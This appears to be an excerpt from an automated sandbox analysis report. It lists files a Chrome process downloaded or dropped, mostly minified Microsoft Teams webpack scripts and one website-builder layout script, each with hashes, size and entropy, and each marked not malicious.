                                                                                                                                                                                                                          Preview:.PNG........IHDR.......E.....?.......pHYs..........{Rk.. .IDATx...x.E..;C.!...e..!."....EH..0L&==......==.!.....B2Dd......XDE.....1"...,""r.!..L...$....~|....z..3...#.....[.....Cm.3.es...V....Z%r.W.&.f.b.U.p!...ARRR.$I.u]....@e:.+.-8....|..4.L..B.7...m.....T.z.....7q.$0a..[.nc(.I..w..........=.w..g.}......:%.[./;..e=.g..d.qu'~..Np..N...N....y]..W...w3^.....o..?K...3^[.nh...r7....Dk+!.>..(.(h(.`.].#uM.n.B....j?,..XV."Y.k.H_.p...`Y..QJ.....Uhozz..t..d.A.|..-..Wu.'r...........n...m...].........'.F.>.'.?..-.'..t...|...r...v..al..zma........m..nx.....5.f..~..9..o{a]......S..}NA..9.....$.S...9E...)j..VQ.}..v...._...........T_.e./...#.."o.....k...c$N...c...e..y.?cII%..&..Ts.aU.A....r.....u/..5P...Q....h.p*..tB.......I'.E.q.q...i..H....H.E...S.......5g..5.B....r.{M...,.H..k8.w.p..^s.t.o...M.<g.>..K..f........ .|..hs........7.... 6.....Z..5O..7_\....i3.mN.s}..\.w.,@....P...Y..c.FU.um...5'..HDU..........W..Q......%.+J,V]ocE=.$...R.....uJ
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (8127)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):8235
                                                                                                                                                                                                                          Entropy (8bit):4.478708887162824
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:6zdoCFq2V28V2DV2535hwYvfvMvavBh+emvI6+e+TJfD6D4SEj2H6w:edoChVPV0VghLvfvMvav/+emvI6+eE3g
                                                                                                                                                                                                                          MD5:8EA58F112F601CFF7AA2D7675882B65E
                                                                                                                                                                                                                          SHA1:115284DC07B6527AC92A9A6640651995613499BE
                                                                                                                                                                                                                          SHA-256:A2481FF7560DC2909D030DC4D7303BCF0E30BB65AA09960B9D6E8D93A7A36A84
                                                                                                                                                                                                                          SHA-512:A67DABF2B3FA32FD3B81A5A0DC32E1A7F286B69FBE6D5D07A614610721606FBBC154D2DFE060497E506A62B854BD46BCEFA625D1629AECCF3504F0B33670CABA
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/119068-f15e591f2b30bed1.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[119068],{119068:(a,l,Z)=>{Z.d(l,{JuR:()=>v,uUQ:()=>h,p46:()=>L,IyQ:()=>m,HMO:()=>r,nfo:()=>H,Dd:()=>c,ICI:()=>M,Cr5:()=>V,zeV:()=>A,do:()=>t,gke:()=>u,AqU:()=>U,ue5:()=>S,S6q:()=>d,lq8:()=>g,z6r:()=>i,qVr:()=>R,xge:()=>s,X_q:()=>k});var e=Z(693935);const v=(0,e.U)("Sparkle20Regular","20",["M7.4 12.8a1.04 1.04 0 0 0 1.59-.51l.45-1.37a2.34 2.34 0 0 1 1.47-1.48l1.4-.45A1.04 1.04 0 0 0 12.25 7l-1.37-.45A2.34 2.34 0 0 1 9.4 5.08L8.95 3.7a1.03 1.03 0 0 0-.82-.68 1.04 1.04 0 0 0-1.15.7l-.46 1.4a2.34 2.34 0 0 1-1.44 1.45L3.7 7a1.04 1.04 0 0 0 .02 1.97l1.37.45a2.33 2.33 0 0 1 1.48 1.48l.46 1.4c.07.2.2.37.38.5Zm.08-7.4.53-1.38.44 1.37a3.33 3.33 0 0 0 2.12 2.12l1.4.53-1.38.45a3.34 3.34 0 0 0-2.11 2.11l-.53 1.38-.45-1.38a3.34 3.34 0 0 0-2.1-2.12L4 7.96 5.4 7.5a3.36 3.36 0 0 0 2.08-2.12Zm6.06 11.45a.8.8 0 0 0 1.22-.4l.25-.76a1.09 1.09 0 0 1 .68-.68l.77-.25a.8.8 0 0 0-.02-1.52l-.77-.25a1.0
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (31117)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):31231
                                                                                                                                                                                                                          Entropy (8bit):5.331629427851176
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:ZtAybJiiyoH8lU668Jix99d0nT2+xFFQEfTkh9Y6DbP9A5FHtQDZrBShFCpj277a:Ztz1iixHFzsfSdvo9Opjyub
                                                                                                                                                                                                                          MD5:449225942154FA45EBA5015871E3BF46
                                                                                                                                                                                                                          SHA1:FEF8F4909B0333254A60D060EE2BC1E26B29378B
                                                                                                                                                                                                                          SHA-256:7B7EE8050E07217ED824E0CB63C98350CC240497A85AEE2AF7FC05A136635352
                                                                                                                                                                                                                          SHA-512:3FA7C6DD874EDE3A1C4499B1E1E8B441C822724A5EA913ECDD7264A147608C2973D43395C3CDD8E2D692B8084EF55428D1BF04C43BEAE3277921F73EC4B18A95
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/msal-service-9932e6430c9a9d87.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[148298],{845484:(e,t,r)=>{r.r(t),r.d(t,{Msal2AuthenticationProvider:()=>k,convertTokenResourceToMsalCompatible:()=>M});var i=r(364819),o=r(280454),n=r(495668),s=r(608911),a=r(981462),c=r(847431),l=r(923226),u=r(848020),d=r(366603),h=r(935008),_=r(510139),g=r(703478),p=r(417694),A=r(469974),m=r(211713),f=r(72909),I=r(78219),S=r(565439),b=r(406138),v=r(775251);const T=["service::api.fl.spaces.skype.com::MBI_SSL"],{PopUpWindowError:R}=c.tG;class k{constructor(e,t,r,n,f){this._config=e,this._currentUrl=t,this._windowProvider=r,this._crossTabCallbacks=n,this._coreSettings=f,this._authority="",this._waitingForHandleRedirectToCompletePromise=void 0,this.login=async e=>{const{correlation:t,silent:r,extraQueryParameters:i}=e,o=e.loginHint||this._config.loginHintFromCore;await this._waitingForHandleRedirectToCompletePromise;const n=!!i?.tenant_login_for_mfa,s=!!i?.isTenantQsp,a=i?.tena
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (14597)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):14704
                                                                                                                                                                                                                          Entropy (8bit):5.338644980766392
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:yDy9KXN9PXncytlT76Hqhv2owjeGFbkRSiYHGqHrPM:yDy9KXN9PXBTeKheowjeGNkRB8HrPM
                                                                                                                                                                                                                          MD5:E257289635424ACB7266CD30D7E54437
                                                                                                                                                                                                                          SHA1:4630D5A9FE4284F06512492D5BFB68BB1D4AFB06
                                                                                                                                                                                                                          SHA-256:771A868DE1B710DC07E726E78E91A8E20F48C49623A0E3057DD8E98F4450887D
                                                                                                                                                                                                                          SHA-512:87D85C1F473931A7CABA721CDF6C9DC2F6728306BD4A42FB22BC0F785D801377EE9E4027B9CE039296F4C9C8B407BC619B0023C2941A956113690650DB50B72A
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/78219-00e9beea3d8f803a.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[78219],{78219:(e,t,r)=>{r.d(t,{aQ:()=>b,yc:()=>f,Hm:()=>E,nF:()=>M,n:()=>A,OP:()=>I,Dk:()=>S,vh:()=>D,Y3:()=>v,qO:()=>x,Gd:()=>U,fw:()=>q,sE:()=>O,SQ:()=>N,wh:()=>$,ih:()=>X,EV:()=>F,dw:()=>B,fo:()=>P,aC:()=>H,g8:()=>z,H4:()=>W,ZH:()=>K,F9:()=>J,Xz:()=>Q,$6:()=>Z,cO:()=>Y,SS:()=>j});var o=r(847431),a=r(625292),n=r(848020),c=r(802756),i=r(955262),s=r(923226),d=r(417694),u=r(406138),l=r(703478),p=r(935008),h=r(161024),y=r(366603),g=r(211713),C=r(775251),m=r(299096),k=r(920506);const b=(e,t)=>{const{id:r,type:o,role:a,profile:n,subType:c,cloud:i,homeAccountId:s}=e,l=_(e),h=i!==l.cloud,y=d.Vh.getValue((0,u.Xr)((0,p.X_)(e)).telemetryInfo);t.setUserToTelemetryContext({id:r,type:o,role:a,oid:n?.oid,tid:n?.tid,subType:c,isCrossCloudUser:!!y?.isCrossCloudUser,isExternal:(0,p.ge)(r,s),userCloud:l.cloud,homeAccountId:h?l.cloud:l?.id,homeTenantId:h?l.cloud:l?.profile.tid})},_=e=>{if(!e.h
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (26514)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):26624
                                                                                                                                                                                                                          Entropy (8bit):5.47874386472264
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:yxu3KtjQqUJDUvNt0qHSoDLRMg6xCY5LBzsuKtggY5d0gIOK1WBnzYEnSQuGwZhM:rqJvsq7R6xCY5LBzsuKtuvQWBnhwYRF
                                                                                                                                                                                                                          MD5:CF497941CAB70F3F1C5113B26C528899
                                                                                                                                                                                                                          SHA1:6B86C6AB1C20A3F8336FBA6E98CDACE4BA1D3CF6
                                                                                                                                                                                                                          SHA-256:5655B735D51892C8895F29B2D3F75B7AC8627DF7A3BEC315AE28CEB2466D51EC
                                                                                                                                                                                                                          SHA-512:D79042A462505539252C34DE44BDA0212E1080F17449DD21ABF0A9F4C50386F6ABBF4B8E55CF2115ED5655779549145E38907A8900904E901DE8891ACF18C98B
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/400532-77cf1bd2c9b72a9f.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[400532],{170962:(e,t,n)=>{n.d(t,{d:()=>i,t:()=>u});var r=n(81984);const i={publicCommercialCloud:"teams.microsoft.com",gccHighCloud:"gov.teams.microsoft.us",dodCloud:"dod.teams.microsoft.us",dev:"local.teams.office.com",devLive:"local.teams.live.com",liveCloud:"teams.live.com",ag08Cloud:"https://teams.eaglex.ic.gov",ag09Cloud:"https://teams.microsoft.scloud"},o=/^(\s|\/)+|(\s|\/)+$/g,a={pathNamesLength:4,threadIDIndex:2,secondPathName:"meetup-join"},s={pathNamesLength:2,meetingIDIndex:1,firstPathName:"meet"};function l(e,t){return[i.dev,i.publicCommercialCloud].includes(t)?[i.devLive,i.liveCloud].includes(e):!![i.devLive,i.liveCloud].includes(t)&&[i.dev,i.publicCommercialCloud].includes(e)}function c(e){let t;try{t=new URL(e)}catch(e){return!1}const n=t.pathname.replace(o,"").split("/");return n.length===a.pathNamesLength&&n[1]===a.secondPathName&&!!n[a.threadIDIndex]||n.leng
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):191032
                                                                                                                                                                                                                          Entropy (8bit):4.954968823799765
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3072:csEk1wI5NFTL45cwYLfrbj52Dd0l2jQkNT5gpdLb96XreEHtfwUzkSK17KipnH+N:csINIwLMX1PENczqY2KvHI
                                                                                                                                                                                                                          MD5:C8DF3DBE1D696D0E5387D3E7832C955C
                                                                                                                                                                                                                          SHA1:10B96DB61F7A9087085F73E11552867FEC508040
                                                                                                                                                                                                                          SHA-256:A3D9D922252F50C420F9443E2CA225167FE1ACF816E2D66EED2594DFAA2692F7
                                                                                                                                                                                                                          SHA-512:5B359123DD48A206035A5FCC5FABC1C8C5BFF34611AAE4B3ACCE067C18B41ECA1D57FF9F6BC58987731A473BE24AAC344BCCEF8D4FAFE4A7DC2ECF5513869A75
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/704334-4685fd55d90d2109.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[704334],{704334:(e,t,a)=>{a.d(t,{NS:()=>n,L8:()=>i,gH:()=>o,hj:()=>r,pD:()=>l,Jk:()=>s,FX:()=>c,X0:()=>d,PX:()=>g,jQ:()=>v,YM:()=>S,_c:()=>f,Yf:()=>y,aQ:()=>I,Wy:()=>w,qd:()=>T,o8:()=>A,YL:()=>k,P2:()=>R,ln:()=>E,Vm:()=>P,lq:()=>D,LW:()=>M,PC:()=>F,hE:()=>L,N_:()=>U,nM:()=>O,T4:()=>N,HZ:()=>V,af:()=>B,Kp:()=>x,g5:()=>W,fp:()=>z,PR:()=>j,vm:()=>q,vd:()=>H,XL:()=>G,tY:()=>Q,cL:()=>J});var n,i,o,r,l,s,c,d,_=a(8435);!function(e){e.PREJOIN="prejoin",e.PLUGIN="plugin"}(n||(n={})),function(e){e.none="None",e.citrix="Citrix",e.vmware="VMware",e.avd="AVD",e.windows365="Windows365",e.citrixSlimCore="CitrixSlimCore",e.vmwareSlimCore="VMwareSlimCore",e.avdSlimCore="AVDSlimCore",e.windows365SlimCore="Windows365SlimCore",e.awsSlimCore="AWSSlimCore"}(i||(i={})),function(e){e.none="",e[e.wvd=43]="wvd",e[e.citrixXenDesktop=44]="citrixXenDesktop",e[e.citrixXenApp=44]="citrixXenApp",e[e.vmware=
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4909)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):4979
                                                                                                                                                                                                                          Entropy (8bit):5.293405946326944
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:beukqzAqebwLvrm04HwiS1SoSuSwS0rtGiSfVSpSrtSG6mSiG5SmUS1CzHSTanSU:beuKwLaVq3BRZx+VA0h65ctHIanVvGbm
                                                                                                                                                                                                                          MD5:D657486D87334CB2FEFF7EA0BE814023
                                                                                                                                                                                                                          SHA1:CCCA2DB7A6D1B83764D75F4E660ECB23A0C3612F
                                                                                                                                                                                                                          SHA-256:0DECBDCF47E29C386E89A67226498BE4FB218C3749B1190FABB83D50590FCA59
                                                                                                                                                                                                                          SHA-512:F958ED459A315710B3C4EFFE1B0A11789B4B29B059EF793DF3F889EA2BB3F7AEAB868DC09B74F47E1B29A7A8B56ABB5B2BD2F3E0DE0FA17E3136D4AFD499ACCC
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://img1.wsimg.com/blobby/go/static/radpack/@widget/LAYOUT/bs-layout14-Theme-publish-Theme-0468020a.js
                                                                                                                                                                                                                          Preview:define("@widget/LAYOUT/bs-layout14-Theme-publish-Theme-0468020a.js",["exports","~/c/bs-_rollupPluginBabelHelpers","~/c/bs-index3","~/c/bs-themeOverrides","~/c/bs-index","~/c/bs-legacyOverrides","~/c/bs-modernThinRound","~/c/bs-defaultSocialIconPack","~/c/bs-loaders"],(function(e,t,r,o,a,n,i,s,l){"use strict";const{colorPackCategories:g,buttons:d}=(global.Core||guac["@wsb/guac-widget-core"]).constants,{LIGHT:u,LIGHT_ALT:c,LIGHT_COLORFUL:m,DARK:p,DARK_ALT:h,DARK_COLORFUL:y,COLORFUL:b,MVP:f}=(global.Core||guac["@wsb/guac-widget-core"]).constants.paintJobs,x=f;var I={id:"layout14",name:"craft",packs:{color:"#283878",font:"muli"},logo:{font:"primary"},packCategories:{color:g.NEUTRAL},headerProperties:{alignmentOption:"center"},paintJobs:[u,c,m,b,y,h,p],defaultPaintJob:x,buttons:{primary:{fill:d.fills.SOLID,shape:d.shapes.PILL,decoration:d.decorations.NONE,shadow:d.shadows.NONE,color:d.colors.PRIMARY},secondary:{fill:d.fills.SOLID,decoration:d.decorations.NONE,shadow:d.shadows.NONE,color:d.c
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (31117)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):31231
                                                                                                                                                                                                                          Entropy (8bit):5.331629427851176
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:ZtAybJiiyoH8lU668Jix99d0nT2+xFFQEfTkh9Y6DbP9A5FHtQDZrBShFCpj277a:Ztz1iixHFzsfSdvo9Opjyub
                                                                                                                                                                                                                          MD5:449225942154FA45EBA5015871E3BF46
                                                                                                                                                                                                                          SHA1:FEF8F4909B0333254A60D060EE2BC1E26B29378B
                                                                                                                                                                                                                          SHA-256:7B7EE8050E07217ED824E0CB63C98350CC240497A85AEE2AF7FC05A136635352
                                                                                                                                                                                                                          SHA-512:3FA7C6DD874EDE3A1C4499B1E1E8B441C822724A5EA913ECDD7264A147608C2973D43395C3CDD8E2D692B8084EF55428D1BF04C43BEAE3277921F73EC4B18A95
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[148298],{845484:(e,t,r)=>{r.r(t),r.d(t,{Msal2AuthenticationProvider:()=>k,convertTokenResourceToMsalCompatible:()=>M});var i=r(364819),o=r(280454),n=r(495668),s=r(608911),a=r(981462),c=r(847431),l=r(923226),u=r(848020),d=r(366603),h=r(935008),_=r(510139),g=r(703478),p=r(417694),A=r(469974),m=r(211713),f=r(72909),I=r(78219),S=r(565439),b=r(406138),v=r(775251);const T=["service::api.fl.spaces.skype.com::MBI_SSL"],{PopUpWindowError:R}=c.tG;class k{constructor(e,t,r,n,f){this._config=e,this._currentUrl=t,this._windowProvider=r,this._crossTabCallbacks=n,this._coreSettings=f,this._authority="",this._waitingForHandleRedirectToCompletePromise=void 0,this.login=async e=>{const{correlation:t,silent:r,extraQueryParameters:i}=e,o=e.loginHint||this._config.loginHintFromCore;await this._waitingForHandleRedirectToCompletePromise;const n=!!i?.tenant_login_for_mfa,s=!!i?.isTenantQsp,a=i?.tena
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4149)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):4257
                                                                                                                                                                                                                          Entropy (8bit):4.471812584842707
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:hydDBZSb/w5jO7Pnwn6irx69i9O67QynsMqXrKz+cQA+A6I:hydlZSb77PSd6YO6MMsMC+n7+Ah
                                                                                                                                                                                                                          MD5:1BE4CDDC6D571645E8EE9A751FAF7EB1
                                                                                                                                                                                                                          SHA1:02E2FFF3FBD785F74089C9CB1D380A15335734D4
                                                                                                                                                                                                                          SHA-256:7EE97714B3FF1AE9124B8737D04D448D2FDB697BF332F5B2D22593D5916EF217
                                                                                                                                                                                                                          SHA-512:2F56DF1A4C068808C904E1DDAEF311E625420B46593E8221FFD404F4D290A4BF791A291BD957A08352FF7665CFD569F44417D17231122588BCF83C338DCB654E
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/118046-b79764f5406c6892.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[118046],{727467:(C,s,e)=>{e.d(s,{f:()=>c});var a=e(957032);const c=(0,e(485529).Ke)({svg:({classes:C})=>(0,a.Y)("svg",{viewBox:"2 2 16 16",role:"presentation",className:C.svg,children:(0,a.Y)("path",{d:"M4.08859 4.21569L4.14645 4.14645C4.32001 3.97288 4.58944 3.9536 4.78431 4.08859L4.85355 4.14645L10 9.293L15.1464 4.14645C15.32 3.97288 15.5894 3.9536 15.7843 4.08859L15.8536 4.14645C16.0271 4.32001 16.0464 4.58944 15.9114 4.78431L15.8536 4.85355L10.707 10L15.8536 15.1464C16.0271 15.32 16.0464 15.5894 15.9114 15.7843L15.8536 15.8536C15.68 16.0271 15.4106 16.0464 15.2157 15.9114L15.1464 15.8536L10 10.707L4.85355 15.8536C4.67999 16.0271 4.41056 16.0464 4.21569 15.9114L4.14645 15.8536C3.97288 15.68 3.9536 15.4106 4.08859 15.2157L4.14645 15.1464L9.293 10L4.14645 4.85355C3.97288 4.67999 3.9536 4.41056 4.08859 4.21569L4.14645 4.14645L4.08859 4.21569Z"})}),displayName:"PeoplePickerDis
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3:U:U
                                                                                                                                                                                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:1
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (14946)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):15054
                                                                                                                                                                                                                          Entropy (8bit):5.152646782756875
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:soyB0m0WM9ymIOoNopcFBsVJbt6Bj4j5V2fMgweKxbAYUNmcz:ByB0VW9mIVipcvQDxEYUNF
                                                                                                                                                                                                                          MD5:AB668D7FD64D6D724AACC13835600172
                                                                                                                                                                                                                          SHA1:270F06034E2A78879F7266A6C0EEE7B0E3C9C638
                                                                                                                                                                                                                          SHA-256:3640B1F9D4CE4975E2F7E4DE3FFA59BD73829A83258DC18DC0125B1DF281742F
                                                                                                                                                                                                                          SHA-512:44B975C509BB412FBA65E54E9B346C09E4454E8986480DD28FAD992D8197801F64B30C625F6166AD2EB0C9E59FA89DA2BF30B1C7B6177DCBD8BC44449F880432
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[425104],{425104:(e,t,n)=>{n.d(t,{Zb:()=>F,Ag:()=>G,kD:()=>w,lg:()=>_,CK:()=>O});const i=Object.entries||function(e){return Object.keys(e).map((function(t){return[t,e[t]]}))};var s=n(305573),o=n(615582);function r(e,t){for(var n=Object.create(null),s=0,o=i(e);s<o.length;s++){var r=o[s],a=r[0],u=r[1];n[a]=t(u,a)}return n}function a(e){if(null===Object.getPrototypeOf(e))return e;for(var t=Object.create(null),n=0,s=i(e);n<s.length;n++){var o=s[n],r=o[0],a=o[1];t[r]=a}return t}var u=n(241921),c=n(625482),f=n(855752),p=5;var d=n(689054);function l(e){return e}var h=n(743357);var v=function(){function e(e){this._input=e,this._inputLowerCase=e.toLowerCase(),this._inputArray=y(this._inputLowerCase),this._rows=[new Array(e.length+1).fill(0),new Array(e.length+1).fill(0),new Array(e.length+1).fill(0)]}return e.prototype.measure=function(e,t){if(this._input===e)return 0;var n=e.toLowerCa
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):956960
                                                                                                                                                                                                                          Entropy (8bit):5.324069629525273
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:12288:hkZVWaypSi43ezbTNZ/0rf8sw127hKeYIvhX:hCVWaypShezbTL/0rf8LwhKe3hX
                                                                                                                                                                                                                          MD5:11FE86E1BFBC795099A8E2EC5FD2BA35
                                                                                                                                                                                                                          SHA1:ED3A0458F300B02387AEECCEBFCB7E58B5BE45A6
                                                                                                                                                                                                                          SHA-256:B74B9A4ED3D4945D1F5013DFB2B41742B587F81863B6D89476BDBE9F821F3FD8
                                                                                                                                                                                                                          SHA-512:3DF3757D44F9DC057CD32295D4ED085D008C82D6E7C844B9F5B139358912F572C22C49CD8EA137036251EE73A4ED9E2F856F95701F15B414476ECC7F8248639B
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/268910-19dd9f09325e420a.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[268910],{669130:(e,r,o)=>{o.d(r,{b:()=>n});var i=o(152608);const t={bodyFontFamily:"-apple-system, BlinkMacSystemFont, 'Segoe UI', system-ui, 'Apple Color Emoji', 'Segoe UI Emoji', 'Segoe UI Web', sans-serif",codeFontFamily:"'Cascadia Mono', Consolas, ui-monospace, Menlo, Monaco, monospace",colors:o(634855).j,colorScheme:{brand:{background4:"#464775"}}},n={siteVariables:{...i.k.siteVariables,...t}}},388136:(e,r,o)=>{o.d(r,{$:()=>w});var i=o(152608),t=o(954057);const n={root:e=>{const{theme:{siteVariables:{colorScheme:r}},variables:{statusNote:o,...i}}=e,{default:n}=r,a=(0,t.jI)("Alert","root");return{...o&&{backgroundColor:n.background4},...i&&a(i,e)}}},a={root:e=>{const{theme:{siteVariables:{colorScheme:r}},variables:{isRosterHeaderMoreMenuButton:o,...i}}=e,{default:n}=r,a=(0,t.jI)("Button","root");return{...o&&{backgroundColor:n.background2},...i&&a(i,e)}}},d={root:e=>{cons
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1846)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):1954
                                                                                                                                                                                                                          Entropy (8bit):5.235922559299956
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:48:wp3sp3ajYEjENkjuX8Vv30IaCUcYtZsjhasXls2OvGpYsHHfWs3lJF2t7AsQksbR:4jYEjENkjuXgvESUDXUaklcsYOesj2t8
                                                                                                                                                                                                                          MD5:1D699FA4A71C9B7AF307FD055FD60673
                                                                                                                                                                                                                          SHA1:17881139B9A85CB04CE94F7D69FDB3A146A075F2
                                                                                                                                                                                                                          SHA-256:4DA7BFBBFBE1C5B2A2AD8E4B71D35054943BEE0810045738DB645D2F99CE66FF
                                                                                                                                                                                                                          SHA-512:7D9AEB65B5FE25560BD2E14C4BDCAED9D63C1563E459528A0C1964B66E59688B1A3A358368B44172C3DE97134B9F008D60B6BC922C1DB0586ADC45DBD034BD97
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/829271-5bfd7ab6aba19f68.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[829271,51652],{829271:(e,t,o)=>{o.r(t),o.d(t,{AnnounceProvider:()=>M,AnnounceProvider_unstable:()=>M,BackgroundAppearanceProvider:()=>w,CustomStyleHooksContext_unstable:()=>k,CustomStyleHooksProvider_unstable:()=>y,OverridesProvider_unstable:()=>p,PortalMountNodeProvider:()=>H,Provider_unstable:()=>P,ThemeClassNameProvider_unstable:()=>a,ThemeContext_unstable:()=>r,ThemeProvider_unstable:()=>u,TooltipVisibilityProvider_unstable:()=>c,useAnnounce:()=>O,useAnnounce_unstable:()=>O,useBackgroundAppearance:()=>N,useCustomStyleHook_unstable:()=>A,useFluent_unstable:()=>x,useOverrides_unstable:()=>h,usePortalMountNode:()=>S,useThemeClassName_unstable:()=>d,useTooltipVisibility_unstable:()=>C});var n=o(513432);const r=n.createContext(void 0),u=r.Provider,i=n.createContext(void 0),s="",a=i.Provider;function d(){var e;return null!==(e=n.useContext(i))&&void 0!==e?e:s}const v=n.createCo
